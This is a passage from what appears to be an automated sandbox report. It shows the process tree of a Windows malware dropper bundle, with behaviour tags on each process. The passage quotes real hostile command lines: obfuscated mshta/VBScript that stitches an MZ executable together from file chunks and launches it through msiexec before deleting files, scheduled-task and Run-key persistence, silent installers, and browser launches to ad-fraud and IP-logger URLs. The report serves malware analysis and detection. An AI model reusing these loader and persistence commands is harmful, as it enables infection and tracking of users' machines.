C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe"C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe"9⤵PID:7340
-
C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe"C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe" -u10⤵PID:8832
-
-
-
C:\Users\Admin\Pictures\Adobe Films\27XBbIsnRU1jbg5LLXRcCgLl.exe"C:\Users\Admin\Pictures\Adobe Films\27XBbIsnRU1jbg5LLXRcCgLl.exe"9⤵PID:4188
-
C:\Users\Admin\AppData\Local\Temp\is-VD1VA.tmp\27XBbIsnRU1jbg5LLXRcCgLl.tmp"C:\Users\Admin\AppData\Local\Temp\is-VD1VA.tmp\27XBbIsnRU1jbg5LLXRcCgLl.tmp" /SL5="$302CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\27XBbIsnRU1jbg5LLXRcCgLl.exe"10⤵
- Loads dropped DLL
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\is-5TM97.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-5TM97.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
PID:9036 -
C:\Users\Admin\AppData\Local\Temp\c0-7631c-720-c409c-7877d4289d0cc\Mushulegyfo.exe"C:\Users\Admin\AppData\Local\Temp\c0-7631c-720-c409c-7877d4289d0cc\Mushulegyfo.exe"12⤵PID:6432
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgqjq35b.nhj\GcleanerEU.exe /eufive & exit13⤵PID:19180
-
C:\Users\Admin\AppData\Local\Temp\mgqjq35b.nhj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mgqjq35b.nhj\GcleanerEU.exe /eufive14⤵PID:2356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10372
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxquj5i0.p0c\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\vxquj5i0.p0c\installer.exeC:\Users\Admin\AppData\Local\Temp\vxquj5i0.p0c\installer.exe /qn CAMPAIGN="654"14⤵PID:8620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe & exit13⤵PID:9188
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exeC:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe14⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe"C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe" -u15⤵PID:6600
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uffxcdbl.feh\gcleaner.exe /mixfive & exit13⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\uffxcdbl.feh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\uffxcdbl.feh\gcleaner.exe /mixfive14⤵PID:8624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8624 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:11856
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x4cv0vb4.jhy\autosubplayer.exe /S & exit13⤵PID:6664
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iobLg91vZLvEF8kRC30NiwUs.exe"C:\Users\Admin\Pictures\Adobe Films\iobLg91vZLvEF8kRC30NiwUs.exe"9⤵
- Loads dropped DLL
PID:7524 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:7020 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵PID:11772
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee012⤵PID:13508
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,9060873892041092508,5059064109560065603,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11772_1480536409" --mojo-platform-channel-handle=1720 /prefetch:812⤵PID:14128
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:5116
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wmOHBUlmJYRTjQx5I_08gsQ9.exe"C:\Users\Admin\Pictures\Adobe Films\wmOHBUlmJYRTjQx5I_08gsQ9.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6644 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
PID:7032 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"9⤵PID:11236
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee010⤵PID:12124
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff65a4e9e70,0x7ff65a4e9e80,0x7ff65a4e9e9011⤵PID:12228
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,6470524122622578317,12390171341293858774,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11236_670610193" --mojo-platform-channel-handle=1740 /prefetch:810⤵PID:13548
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WVl9U240Z3iuGFJtZ_uUW87k.exe"C:\Users\Admin\Pictures\Adobe Films\WVl9U240Z3iuGFJtZ_uUW87k.exe"7⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\is-AM0G4.tmp\WVl9U240Z3iuGFJtZ_uUW87k.tmp"C:\Users\Admin\AppData\Local\Temp\is-AM0G4.tmp\WVl9U240Z3iuGFJtZ_uUW87k.tmp" /SL5="$20274,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WVl9U240Z3iuGFJtZ_uUW87k.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5204 -
C:\Users\Admin\AppData\Local\Temp\is-6LDFJ.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-6LDFJ.tmp\DYbALA.exe" /S /UID=27109⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:6624 -
C:\Program Files\Common Files\MWUMGVDMQL\foldershare.exe"C:\Program Files\Common Files\MWUMGVDMQL\foldershare.exe" /VERYSILENT10⤵PID:4316
-
-
C:\Users\Admin\AppData\Local\Temp\ef-ce0f3-534-0a4a3-d31003a68c318\Qitiluhyta.exe"C:\Users\Admin\AppData\Local\Temp\ef-ce0f3-534-0a4a3-d31003a68c318\Qitiluhyta.exe"10⤵PID:9124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
- Executes dropped EXE
PID:5284 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
- Executes dropped EXE
PID:1692
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵PID:2828
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵PID:2340
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵PID:15076
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵PID:15104
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵PID:15924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵PID:7720
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵PID:16852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵PID:16880
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵PID:17956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵PID:17980
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵PID:16088
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵PID:18692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a2-40300-3b3-704a0-9737570e4aab2\Pyshomemihe.exe"C:\Users\Admin\AppData\Local\Temp\a2-40300-3b3-704a0-9737570e4aab2\Pyshomemihe.exe"10⤵PID:6944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lu2hkv3m.pmb\GcleanerEU.exe /eufive & exit11⤵PID:19436
-
C:\Users\Admin\AppData\Local\Temp\lu2hkv3m.pmb\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\lu2hkv3m.pmb\GcleanerEU.exe /eufive12⤵PID:552
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 18813⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10848
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2p3ean5.v1h\installer.exe /qn CAMPAIGN="654" & exit11⤵PID:4340
-
C:\Users\Admin\AppData\Local\Temp\y2p3ean5.v1h\installer.exeC:\Users\Admin\AppData\Local\Temp\y2p3ean5.v1h\installer.exe /qn CAMPAIGN="654"12⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe & exit11⤵PID:8828
-
C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exeC:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe12⤵PID:8204
-
C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe"C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe" -u13⤵PID:9456
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqxuo0qn.44j\gcleaner.exe /mixfive & exit11⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\jqxuo0qn.44j\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jqxuo0qn.44j\gcleaner.exe /mixfive12⤵PID:9944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9944 -s 23613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:12956
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ljdowagf.kwu\autosubplayer.exe /S & exit11⤵PID:9676
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe5⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue097328c1b990.exeTue097328c1b990.exe6⤵
- Executes dropped EXE
PID:3108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0978af55b9.exeTue0978af55b9.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe5⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe6⤵
- Executes dropped EXE
PID:2996 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )7⤵PID:2232
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"8⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u869⤵PID:5952
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )10⤵PID:6032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"11⤵PID:5204
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT:cloSE (cREateObJEct( "wsCRipt.SheLl" ).rUn( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " ,0, TRue))10⤵PID:7060
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F &Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *11⤵PID:5888
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "12⤵PID:5460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"12⤵PID:1640
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n12⤵
- Loads dropped DLL
PID:6712
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c6db969ab9.exeTue09c6db969ab9.exe6⤵
- Executes dropped EXE
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c6db969ab9.exe7⤵
- Executes dropped EXE
PID:5352 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 288⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe5⤵PID:2216
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe6⤵
- Executes dropped EXE
PID:4556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6512
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe5⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c1731fe55c7.exe7⤵
- Executes dropped EXE
PID:4012
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe5⤵PID:1268
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0947ef38552fc.exeTue0947ef38552fc.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:904 -
C:\Users\Public\run.exeC:\Users\Public\run.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:6724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3088 -s 2888⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6040
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe7⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1752 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji78⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6876 -
